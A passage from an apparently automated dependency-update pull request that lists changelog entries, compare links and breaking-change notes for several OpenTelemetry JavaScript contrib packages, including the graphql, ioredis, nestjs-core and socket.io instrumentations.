Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/ac8641a5dbb5df1169bd5ed25a6667a6a6f730ca...7fde94081ed141c7d61db269b77d5765887a9665) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/host-metrics)</summary> ### [`v0.36.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0362-2025-09-29) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46) ##### Bug Fixes - force new release-please PR ([#​3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123)) ([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0)) ### [`v0.36.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0361-2025-09-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...931c7b34f53ea625da900726b1f57c5c934b5b28) ##### Bug Fixes - force new release-please PR ([#​3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098)) ([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73)) ### [`v0.36.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0360-2025-03-18) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/d4d3c4f14faa634de960a7616ec2e6115b1b6347...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7) ##### ⚠ BREAKING CHANGES - chore!: Update to 2.x and 0.200.x @​opentelemetry/\* packages from opentelemetry-js.git per [2.x upgrade guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md) - The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0. This means that support for Node.js 14 and 16 has been dropped. - The minimum supported TypeScript version has been raised to 5.0.4. - The compilation target for transpiled TypeScript has been raised to ES2022 (from ES2017). ##### Miscellaneous Chores - update to JS SDK 2.x ([#​2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738)) ([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-graphql)</summary> ### [`v0.55.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0550-2025-10-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187)) ([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc)) ### [`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0540-2025-10-06) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145)) ([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f)) ### [`v0.53.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0533-2025-09-29) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46) ##### Bug Fixes - force new release-please PR ([#​3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123)) ([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0)) ### [`v0.53.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0532-2025-09-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28) ##### Bug Fixes - force new release-please PR ([#​3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098)) ([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73)) ### [`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0530-2025-09-10) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034)) ([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820)) ### [`v0.52.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0520-2025-09-08) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec) ##### Features - **deps:** update otel deps ([#​3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027)) ([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a)) ### [`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0510-2025-07-09) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930)) ([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea)) ### [`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0500-2025-06-02) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871)) ([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc)) ### [`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0490-2025-05-15) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...393b51596dc869983a03ce8857658029ca122a15) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828)) ([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346)) ### [`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0480-2025-03-18) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7) ##### ⚠ BREAKING CHANGES - chore!: Update to 2.x and 0.200.x @​opentelemetry/\* packages from opentelemetry-js.git per [2.x upgrade guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md) - The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0. This means that support for Node.js 14 and 16 has been dropped. - The minimum supported TypeScript version has been raised to 5.0.4. - The compilation target for transpiled TypeScript has been raised to ES2022 (from ES2017). ##### Bug Fixes - **deps:** update otel core experimental to ^0.57.2 ([#​2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716)) ([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da)) ##### Miscellaneous Chores - update to JS SDK 2.x ([#​2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738)) ([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-ioredis)</summary> ### [`v0.55.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0550-2025-10-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187)) ([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc)) ##### Bug Fixes - **deps:** update all patch versions ([#​3134](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3134)) ([c302e35](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c302e3530d6ee9a856ffb43730082e1cee87b0ee)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.53.0 to ^0.54.0 ### [`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0540-2025-10-06) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145)) ([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.52.2 to ^0.53.0 ### [`v0.53.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0533-2025-09-29) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46) ##### Bug Fixes - force new release-please PR ([#​3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123)) ([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0)) ##### Dependencies - The following workspace dependencies were updated - dependencies - [@​opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common) bumped from ^0.38.1 to ^0.38.2 - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.52.1 to ^0.52.2 ### [`v0.53.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0532-2025-09-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28) ##### Bug Fixes - force new release-please PR ([#​3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098)) ([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73)) ##### Dependencies - The following workspace dependencies were updated - dependencies - [@​opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common) bumped from ^0.38.0 to ^0.38.1 - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.52.0 to ^0.52.1 ### [`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0530-2025-09-10) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034)) ([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.50.0 to ^0.51.0 ### [`v0.52.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0520-2025-09-08) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec) ##### Features - **deps:** update otel deps ([#​3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027)) ([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.49.0 to ^0.50.0 ### [`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0510-2025-07-09) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/52dd28deae0ebfbec43bdaed82f4749fc9803797...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930)) ([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.48.0 to ^0.49.0 ### [`v0.50.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0501-2025-07-04) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...52dd28deae0ebfbec43bdaed82f4749fc9803797) ##### Dependencies - The following workspace dependencies were updated - dependencies - [@​opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common) bumped from ^0.37.0 to ^0.38.0 ### [`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0500-2025-06-02) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871)) ([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.47.0 to ^0.48.0 ### [`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0490-2025-05-15) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...393b51596dc869983a03ce8857658029ca122a15) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828)) ([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.46.0 to ^0.47.0 ### [`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0480-2025-03-18) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7) ##### ⚠ BREAKING CHANGES - chore!: Update to 2.x and 0.200.x @​opentelemetry/\* packages from opentelemetry-js.git per [2.x upgrade guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md) - The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0. This means that support for Node.js 14 and 16 has been dropped. - The minimum supported TypeScript version has been raised to 5.0.4. - The compilation target for transpiled TypeScript has been raised to ES2022 (from ES2017). ##### Bug Fixes - **deps:** update otel core experimental to ^0.57.2 ([#​2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716)) ([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da)) ##### Miscellaneous Chores - update to JS SDK 2.x ([#​2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738)) ([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5)) ##### Dependencies - The following workspace dependencies were updated - dependencies - [@​opentelemetry/redis-common](https://redirect.github.com/opentelemetry/redis-common) bumped from ^0.36.2 to ^0.37.0 - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.45.1 to ^0.46.0 </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-nestjs-core)</summary> ### [`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0540-2025-10-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187)) ([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc)) ##### Bug Fixes - **deps:** update all patch versions ([#​3134](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3134)) ([c302e35](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/c302e3530d6ee9a856ffb43730082e1cee87b0ee)) ### [`v0.53.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0530-2025-10-06) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46...333e026413f082f90859bb778abf7519fbffa940) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3145](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3145)) ([704c716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/704c7161f782590d7b644ab607b5f9c29cdfd63f)) ### [`v0.52.2`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0522-2025-09-29) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/931c7b34f53ea625da900726b1f57c5c934b5b28...5a5918fd4f9f16b14c9ef4d3de08ab98c20e5b46) ##### Bug Fixes - force new release-please PR ([#​3123](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3123)) ([0dab838](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/0dab8383b5349e21a968fe2cedd8a6e2243f86d0)) ### [`v0.52.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0521-2025-09-25) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e...931c7b34f53ea625da900726b1f57c5c934b5b28) ##### Bug Fixes - force new release-please PR ([#​3098](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3098)) ([13c58e9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/13c58e9ad77b266a03e34ffd4b61ab18c86f9d73)) ### [`v0.51.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0510-2025-09-10) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0a45ac1b951d2acd2e40834e7ae012c04820faec...f54a1ba1adf19fd2cbf9ddbdb32a3baca2ed328e) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3034](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3034)) ([bee0a66](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/bee0a66ef825145fb1a9b172c3468ccf0c97a820)) ### [`v0.50.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0500-2025-09-08) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/e7960a2061c0a039ffa57ed8dbb73d605d65f4f6...0a45ac1b951d2acd2e40834e7ae012c04820faec) ##### Features - **deps:** update otel deps ([#​3027](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3027)) ([fd9e262](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/fd9e262fabf4e8fd8e246b8967892fa26442968a)) ### [`v0.49.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0490-2025-07-09) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/52dd28deae0ebfbec43bdaed82f4749fc9803797...e7960a2061c0a039ffa57ed8dbb73d605d65f4f6) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2930](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2930)) ([e4ab2a9](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ab2a932084016f9750bd09d3f9a469c44628ea)) ### [`v0.48.1`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0481-2025-07-04) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7481f71d615acf161b5c86dd4abce1434a860a3d...52dd28deae0ebfbec43bdaed82f4749fc9803797) ##### Bug Fixes - **deps:** update all patch versions ([#​2832](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2832)) ([e45605d](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e45605d0e70158b0ea868bc3c8acb65095d6d4d1)) ### [`v0.48.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0480-2025-06-02) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/393b51596dc869983a03ce8857658029ca122a15...7481f71d615acf161b5c86dd4abce1434a860a3d) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2871](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2871)) ([d33c6f2](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d33c6f232a3c5673e618fa62692d2d3bbfe4c0fc)) ### [`v0.47.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0470-2025-05-15) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/88386368afca78a4b3ed898eb5c28e4f5bde2271...393b51596dc869983a03ce8857658029ca122a15) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​2828](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2828)) ([59c2a4c](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/59c2a4c002992518da2d91b4ceb24f8479ad2346)) ### [`v0.46.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0460-2025-04-08) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/32abc4c3c01d0e78e10022c74b6805b06e0e1fe7...88386368afca78a4b3ed898eb5c28e4f5bde2271) ##### Features - **instrumentation-nestjs-core:** add support for NestJS 11 ([#​2685](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2685)) ([67e37b7](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/67e37b78ab46273e937fb959b6c8cdcf9e16c8fb)) ### [`v0.45.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0450-2025-03-18) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/1eb77007669bae87fe5664d68ba6533b95275d52...32abc4c3c01d0e78e10022c74b6805b06e0e1fe7) ##### ⚠ BREAKING CHANGES - chore!: Update to 2.x and 0.200.x @​opentelemetry/\* packages from opentelemetry-js.git per [2.x upgrade guide](https://redirect.github.com/open-telemetry/opentelemetry-js/blob/main/doc/upgrade-to-2.x.md) - The minimum supported Node.js has been raised to ^18.19.0 || >=20.6.0. This means that support for Node.js 14 and 16 has been dropped. - The minimum supported TypeScript version has been raised to 5.0.4. - The compilation target for transpiled TypeScript has been raised to ES2022 (from ES2017). ##### Bug Fixes - **deps:** update otel core experimental to ^0.57.2 ([#​2716](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2716)) ([d2a9a20](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d2a9a20f1cd8c46c842e18490a4eba36fd71c2da)) ##### Miscellaneous Chores - update to JS SDK 2.x ([#​2738](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/2738)) ([7fb4ba3](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/7fb4ba3bc36dc616bd86375cfd225722b850d0d5)) </details> <details> <summary>open-telemetry/opentelemetry-js-contrib (@​opentelemetry/instrumentation-socket.io)</summary> ### [`v0.54.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0540-2025-10-21) [Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/333e026413f082f90859bb778abf7519fbffa940...2801ab2f0f9243b154a624298dacb7228c4f70cd) ##### Features - **deps:** update deps matching '@​opentelemetry/\*' ([#​3187](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3187)) ([ab96334](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ab9633455794de79964e60775c804791d19259bc)) ##### Dependencies - The following workspace dependencies were updated - devDependencies - [@​opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.53.0 to ^0.54.0 ### 